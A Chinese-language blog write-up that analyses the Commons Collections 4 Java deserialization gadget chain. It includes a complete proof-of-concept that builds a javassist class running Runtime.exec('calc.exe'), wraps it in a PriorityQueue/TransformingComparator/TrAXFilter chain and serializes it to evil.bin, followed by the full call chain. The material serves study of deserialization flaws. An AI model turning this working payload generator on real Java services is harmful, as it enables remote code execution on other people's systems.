Commons Collections 4

序言

利用环境: Commons-collections 4.0 java版本无要求

CC4就是CC2和CC3的合体,大致与CC2一样,唯一的变动就是将CC2中触发newTransform的方法替换成了CC3中的TrAXFilterInstantiateTransformer

分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
package CC4;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class test {
    public static void main(String args[]) throws Exception{
        //javassist 生成字节码
        ClassPool pool=ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass test=pool.makeClass("EvilTeabo");
        String name="EvilTeabo";
        test.setName(name);
        String cmd="java.lang.Runtime.getRuntime().exec(\"calc.exe\");";
        //System.out.println(pool.get(AbstractTranslet.class.getName()));
        test.setSuperclass(pool.get(AbstractTranslet.class.getName()));
        CtConstructor cst=test.makeClassInitializer();
        cst.insertBefore(cmd);
        test.writeFile("./");

        byte[] bytes= test.toBytecode();

        //TemplatesImpl 加载字节码
        TemplatesImpl templates=TemplatesImpl.class.newInstance();
        Class temp=Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");

        //先挨个设置反射时候内部链所需的值
        Field _name=temp.getDeclaredField("_name");
        _name.setAccessible(true);
        _name.set(templates,"Teabo");  //_name满足非空

        Field _class= temp.getDeclaredField("_class");
        _class.setAccessible(true);
        _class.set(templates,null);   //_class满足为Null

        Field _bytecodes = temp.getDeclaredField("_bytecodes");
        _bytecodes.setAccessible(true);
        _bytecodes.set(templates,new byte[][]{bytes}); // _bytecodes赋值一个javassist得到的Byte数组

        Field _tfactory = temp.getDeclaredField("_tfactory");
        _tfactory.setAccessible(true);
        _tfactory.set(templates,new TransformerFactoryImpl()); // _tfactory 初始化

        //
        //构造chainedTransformer,用TrAXFilter调用InstantiateTransformer的newIntance()
        Transformer[] chain=new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})
        };
        ChainedTransformer chained1=new ChainedTransformer(chain);
        //创建TransformingComparator示例,并传入ChainedTransformer,直接调用ChainedTransformer.transform
        TransformingComparator comparator1 = new TransformingComparator(chained1);

        //创建PriorityQueue
        PriorityQueue queue1=new PriorityQueue(123);

        //反射修改size属性
        Field size=Class.forName("java.util.PriorityQueue").getDeclaredField("size");
        size.setAccessible(true);
        size.set(queue1,2);
        //反射修改comparator
        Field comparator=Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        comparator.setAccessible(true);
        comparator.set(queue1,comparator1);

        //序列化
        ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./evil.bin"));
        outputStream.writeObject(queue1);
        outputStream.close();
        //反序列化
        ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./evil.bin"));
        inputStream.readObject();



    }
}

首先前半部分和CC3与CC2一样,都是javassist生成字节码,templatesImpl来准备加载字节码

image-20210803103517196

image-20210803103540301

然后接下来就是二链结合之处了

image-20210803103613128

1
2
3
4
5
6
7
8
//构造chainedTransformer,用TrAXFilter调用InstantiateTransformer的newIntance()
        Transformer[] chain=new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})
        };
        ChainedTransformer chained1=new ChainedTransformer(chain);
        //创建TransformingComparator示例,并传入ChainedTransformer,直接调用ChainedTransformer.transform
        TransformingComparator comparator1 = new TransformingComparator(chained1);

我们来看看CC2中这里是如何构造的

image-20210803103716728

1
2
3
4
5
6
7
//创建InvokerTransformer并实例化 传入参数newTransformer,后续调用TemplatesImpl.newTransformer
        Constructor cst1 =Class.forName("org.apache.commons.collections4.functors.InvokerTransformer").getDeclaredConstructor(String.class);
        cst1.setAccessible(true);
        InvokerTransformer invokertransformer=(InvokerTransformer) cst1.newInstance("newTransformer");

        //创建TransformingComparator示例,并传入InvokerTransformer,后续调用InvokerTransformer.transform
        TransformingComparator tsf=new TransformingComparator(invokertransformer);

我们知道在 TransformingComparator的compare()方法中可以触发transform

image-20210803103808201

所以在CC2中是利用这个地方来调用InvokerTransformer.transform,进而反射调用TemplatesImpl.newTransform(),最后实例化加载字节码。

而在上一节CC3中我们知道了TrAXFilterInstantiateTransformer也能组合拳调用TemplatesImpl.newTransform(),所以这里自然而然就不再用InvokerTransformer多此一举了。

接下来就如同CC2一样,利用PriortyQueue队列的readObject()作为入口

image-20210803103852218

又因为我们不用InvokerTransformer,用的是ChainedTransformer的transform

所以这里就不需要接受传参了(obj1与obj2)

image-20210803103933459

只要进入到compare(),调用ChainedTransformer.transform()即可,传入参数无所谓。不需要像InvokerTransformer那样传入TemplatesImpl,设置反射获取方法的类。

例:

image-20210803104001524

自然也就不需要反射设置队列的queue属性了

image-20210803104026759

​ (CC2设置queue属性为templates)

利用链:

1
2
3
4
5
6
7
8
9
10
11
PriorityQueue.readObject
->PriorityQueue.heapify->PriorityQueue.siftDown
->PriorityQueue.siftDownUsingComparator
->TransformingComparator.compare
->ChainedTransformer.transform
->TrAXFilter(构造方法)
->TemplatesImpl.newTransformer
->TemplatesImpl.getTransletInstance
->TemplatesImpl.defineTransletClasses
->(动态创建的类)cc4.newInstance()
->Runtime.exec()

结尾

cc3是cc1和cc2的结合,cc4是cc2和cc3的结合,就是利用了CC3中的TrAXFilter和InstantiateTransformer来触发TemplatesImpl.newTransform()

本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

摸爬滚打学习的web菜狗